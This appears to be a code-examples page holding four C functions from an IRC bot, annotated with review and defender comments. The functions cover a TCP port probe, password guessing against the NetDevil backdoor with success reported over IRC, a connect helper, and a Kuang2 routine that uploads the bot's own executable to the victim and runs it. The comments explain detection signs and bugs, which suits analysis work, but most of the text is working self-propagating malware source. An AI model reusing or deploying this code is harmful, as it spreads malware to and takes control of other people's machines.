Beispiel #1
// Reports whether a TCP connection to ip:port completes within `delay` seconds.
//
// ip    - IPv4 address, copied into sin_addr unchanged (presumably already in
//         network byte order - confirm against callers).
// port  - TCP port in host order; truncated to 16 bits before fhtons().
// delay - select() timeout in whole seconds.
//
// Returns TRUE when fselect() reports the socket in the write set, FALSE on
// socket-creation failure, timeout or select error.
//
// NOTE(review): the f-prefixed calls (fsocket, fconnect, ...) are defined outside
// this listing; they look like wrappers or pointers for the Winsock functions of
// the same name - confirm.
//
// Defender's view: every call performs a complete TCP connect and then closes the
// socket without sending or receiving a byte. A host producing many such
// short-lived, data-free connections across addresses or ports is the pattern
// that connect-scan detections key on.
BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
{
	// NOTE(review): sin is never zeroed; only family, address and port are
	// assigned below, so the remaining bytes of the structure are indeterminate.
	SOCKADDR_IN sin;
	// Non-zero FIONBIO argument: switch the socket to non-blocking mode.
	unsigned long blockcmd=1;

	SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
	if (sock == INVALID_SOCKET) 
		return FALSE;

	sin.sin_family = AF_INET;
	sin.sin_addr.S_un.S_addr = ip;
	sin.sin_port = fhtons((unsigned short)port);
	// Return values of the next two calls are ignored; the outcome of the
	// non-blocking connect is observed only through fselect() below.
	fioctlsocket(sock,FIONBIO,&blockcmd);
	fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));

	TIMEVAL timeout;
	timeout.tv_sec=delay;
	timeout.tv_usec=0;
	// Despite its name, rset is passed as the third (write-set) argument.
	FD_SET rset;
	FD_ZERO(&rset);
	FD_SET(sock,&rset);

	// Only the write set is watched; no read or except set is supplied.
	int i = fselect(0,0,&rset,0,&timeout);
	// The probe socket is always closed; the caller receives only the boolean.
	fclosesocket(sock);

	// i <= 0 covers both timeout (0) and error (negative).
	if (i<=0) 
		return FALSE;
	else 
		return TRUE;
}
Beispiel #2
// Walks the global passwords[] list against a service at exinfo.ip:exinfo.port
// that speaks the "pass_pleaz" / "passed" dialogue below and, once the peer
// answers "passed", hands the socket to NetDevil_Upload().
//
// exinfo - target (ip, port), reporting channel (sock, chan, notice, silent) and
//          the index into the global exploit[] table used for naming and stats.
//
// Returns TRUE only when NetDevil_Upload() returns 1; FALSE in every other case.
// NetDevil_Receive(), NetDevil_Upload(), passwords[], exploit[], irc_privmsg()
// and addlog() are defined outside this listing.
//
// NOTE(review), memory safety as written:
//  - frecv() may fill all sizeof(buffer) bytes, leaving no terminator for the
//    strcmp() calls that follow.
//  - passwords[i-1] is read in the "passed" branch; if the peer answers "passed"
//    on the first round (i == 0) that is index -1.
//  - both sprintf() calls write into buffer without a length bound.
//
// Defender's view: the dialogue is cleartext, so the literals "pass_pleaz" and
// "passed" and the "nd <ip> <password>" line are visible on the wire; guesses
// are made on one connection at roughly 50 ms intervals. On success the
// formatted line (target IP and accepted password) goes to the log via addlog()
// and, unless exinfo.silent is set, to the IRC channel.
BOOL NetDevil(EXINFO exinfo)
{
	char buffer[IRCLINE];
	// Zero FIONBIO argument: blocking mode.
	DWORD mode=0;

	SOCKET ssock;
	if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) 
		return FALSE;

	SOCKADDR_IN sin;
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = finet_addr(exinfo.ip);
	sin.sin_port = fhtons(exinfo.port);

	// NOTE(review): the connect result is not checked; a failed connect
	// presumably surfaces only when the first receive below fails.
	fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
	fioctlsocket(ssock,FIONBIO,&mode);

	// The list is treated as terminated by its first NULL (zero) entry.
	for (int i=0; passwords[i]; i++) {
		Sleep(50);

		memset(buffer,0,sizeof(buffer));

		// Any receive failure or closed connection ends the attempt.
		if (NetDevil_Receive(ssock) == -1) 
			break;
		if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0) 
			break;
		// "passed" follows a guess sent in the previous round, hence the
		// i-1 index for the accepted entry.
		if (strcmp(buffer,"passed") == 0) {
			sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]); 
			fsend(ssock, buffer, strlen(buffer), 0);	

			if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
				fclosesocket(ssock);

				// NOTE(review): passwords[i-i] is always passwords[0], unlike
				// the passwords[i-1] used for the value that is printed, so the
				// "(no password)" text depends on the first list entry only.
				_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
				if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
				addlog(buffer);
				exploit[exinfo.exploit].stats++;

				return TRUE;
			}
			break;	
		}
		// Peer is asking for a password: send the current candidate and loop.
		if (strcmp(buffer,"pass_pleaz") == 0) {
			memset(buffer,0,sizeof(buffer));
			sprintf(buffer,"pass_pleaz%s",passwords[i]); 
			fsend(ssock,buffer ,strlen(buffer), 0);

			continue;
		}
		// Any other reply aborts the dialogue.
		else break;
	}
	fclosesocket(ssock);

	return FALSE;
}
Beispiel #3
// FIX ME: This could probably be (re)moved, its just from the original exploit layout.
// Opens a TCP connection to WksIP:port, waiting at most `tm` seconds for it to
// complete, and returns the connected socket.
//
// tm    - connect timeout in whole seconds.
// port  - TCP port in host order (converted with fhtons()).
// WksIP - dotted-quad IPv4 address string passed to finet_addr().
//
// Returns the socket value as an int, or -1 when the socket cannot be created or
// is not reported writable after the wait. On success the caller owns the socket;
// nothing in this function closes it.
//
// NOTE(review): the socket is held in an unsigned int and returned as int; on
// targets where SOCKET is wider than int this would truncate - confirm the build
// target. The f-prefixed calls are defined outside this listing.
int WksSocket(int tm, int port, const char *WksIP) {

	unsigned int sock;
	// Non-zero FIONBIO argument: non-blocking mode (reset to 0 further down).
	unsigned long y = 1;
	struct timeval timeout;
	struct sockaddr_in target_ip;

	// The -1 is converted to unsigned for this comparison.
	if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1) 
		return -1;

	target_ip.sin_family = AF_INET;
	target_ip.sin_addr.s_addr = finet_addr(WksIP);
	target_ip.sin_port = fhtons(port);

	fioctlsocket(sock,FIONBIO,&y);

	timeout.tv_sec=tm;
	timeout.tv_usec = 0;

	// A non-blocking connect normally returns -1 straight away; completion is
	// then awaited with fselect(). NOTE(review): if fconnect() returns anything
	// else, this block is skipped and the socket is returned still non-blocking.
	if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1) 
	{
		fd_set writefds;
		fd_set exceptfds;

		FD_ZERO (&writefds);
		FD_ZERO (&exceptfds);
		FD_SET (sock, &writefds);
		FD_SET (sock, &exceptfds);

		// Return value ignored; the outcome is read from writefds below.
		// exceptfds is filled in but never inspected afterwards.
		fselect(0, NULL, &writefds, &exceptfds, &timeout);  

		//if (!FDI_ISSET (sock, &writefds)) 
		if (!__fWSAFDIsSet(sock, &writefds)) 
		{
				fclosesocket(sock);
			return -1;
		}
		// Connected: put the socket back into blocking mode for the caller.
		y=0;
		fioctlsocket(sock,FIONBIO,&y);
	}
	return sock;
}
Beispiel #4
// Sends this process's own executable image over an already-connected socket
// using the K2_* command messages, asks the peer to store it under a random
// name and then to run it.
//
// sock - connected socket; switched to blocking mode here.
//
// Returns 1 after the K2_QUIT message has been sent, 0 on any failure (the
// socket is closed on the failure path only).
//
// k2_buffer, k2_msg, KUANG_Reciev() and the K2_* constants are defined outside
// this listing. k2_msg presumably points into k2_buffer (the buffer is zeroed,
// fields are set through k2_msg, then k2_buffer is sent) - confirm.
//
// NOTE(review), resource handling as written:
//  - the `goto end` paths taken after CreateFile() succeeded leave testfile open;
//    the end label closes only the socket.
//  - the success path returns without closing sock; whether the caller does is
//    not visible here.
//
// Defender's view: the file name sent to the peer is always
// c:\<four lowercase letters>.exe, and it is followed by a run request for the
// same path, so creation and execution of such a file in the root of C: is the
// host-side artefact of this routine. The payload is the sender's own image
// (GetModuleFileName(NULL, ...)), i.e. the routine self-propagates.
int KUANG(SOCKET sock)
{
	HANDLE testfile;
	char rBuffer[1024], thisfilename[MAX_PATH], randFile[5], rFile[15];

	unsigned int Fsize, move;
	int x;
	// Zero FIONBIO argument (blocking); later reused as ReadFile's byte count.
	DWORD mode = 0;

	memset(rFile,0,sizeof(rFile));
	memset(randFile,0,sizeof(randFile));
	// Names are seeded from the tick count only.
	srand(GetTickCount());

	// Four random letters 'a'..'z' (97 is 'a').
	for (x=0;x < 4;x++)
		randFile[x] = (char)((rand()%26)+97);
	// NOTE(review): x is 4 here, so this writes randFile[5], one byte past the
	// 5-byte array. randFile[4] is already 0 from the memset above.
	randFile[x+1] = '\0';
	sprintf(rFile,"c:\\%s.exe",randFile);

	fioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking
	if (KUANG_Reciev(sock) == -1) 
		goto end;

	memset(k2_buffer,0,sizeof(k2_buffer));
	// Open this process's own executable for reading.
	GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
	testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
	if (testfile == INVALID_HANDLE_VALUE) 
		goto end;
	Fsize = GetFileSize(testfile,NULL);

	// Upload request: file size in param, destination path in sdata.
	k2_msg->command=K2_UPLOAD_FILE;
	k2_msg->param=Fsize;
	strcpy(k2_msg->sdata,rFile);
	//strcpy(k2_msg->bdata,rFile);
	//CloseHandle(testfile);

	// Command messages are sent as a fixed 1024 bytes.
	fsend(sock,k2_buffer,1024, 0);
	if (KUANG_Reciev(sock) == -1) 
		goto end;

	// Stream the file in chunks of at most 1024 bytes; Fsize counts the bytes
	// still to send.
	while (Fsize) {
		unsigned int Fsend = 1024;
		memset(rBuffer,0,sizeof(rBuffer));

		if (Fsend>Fsize) 
			Fsend=Fsize;
		// Unsigned negation: an offset of -Fsize from the end of the file, i.e.
		// the first byte not yet sent. Re-seeking every round also covers
		// partial sends.
		move = 0-Fsize;

		SetFilePointer(testfile, move, NULL, FILE_END);
		// NOTE(review): the ReadFile result is not checked; after a failed read
		// the zeroed rBuffer is sent anyway.
		ReadFile(testfile, rBuffer, Fsend, &mode, NULL);

		int bytes_sent = fsend(sock, rBuffer, Fsend, 0);
		if (bytes_sent == SOCKET_ERROR) {
			// WSAEWOULDBLOCK counts as "nothing sent" and is retried at once;
			// any other error leaves the loop.
			if (fWSAGetLastError() != WSAEWOULDBLOCK) 
				break;
			else 
				bytes_sent = 0;
		}
		Fsize = Fsize - bytes_sent;
	}

	if (KUANG_Reciev(sock) == -1) 
		goto end;
	if (testfile != INVALID_HANDLE_VALUE) 
		CloseHandle(testfile);

	// Run request for the path that was just uploaded.
	memset(k2_buffer,0,sizeof(k2_buffer));
	k2_msg->command=K2_RUN_FILE;
	// NOTE(review): rFile is used as the format string. It is built locally from
	// "c:\\", four a-z letters and ".exe", so it holds no '%' here.
	sprintf(k2_msg->bdata,rFile);
	fsend(sock,k2_buffer ,1024, 0);

	if (KUANG_Reciev(sock) == -1) 
		goto end;
	// Quit message: only the first 4 bytes of the buffer are sent.
	memset(k2_buffer,0,sizeof(k2_buffer));
	k2_msg->command=K2_QUIT;
	fsend(sock,k2_buffer ,4, 0);

	return 1;

	// Failure path: close the socket and report 0.
	end:;

	fclosesocket(sock);

	return 0;
}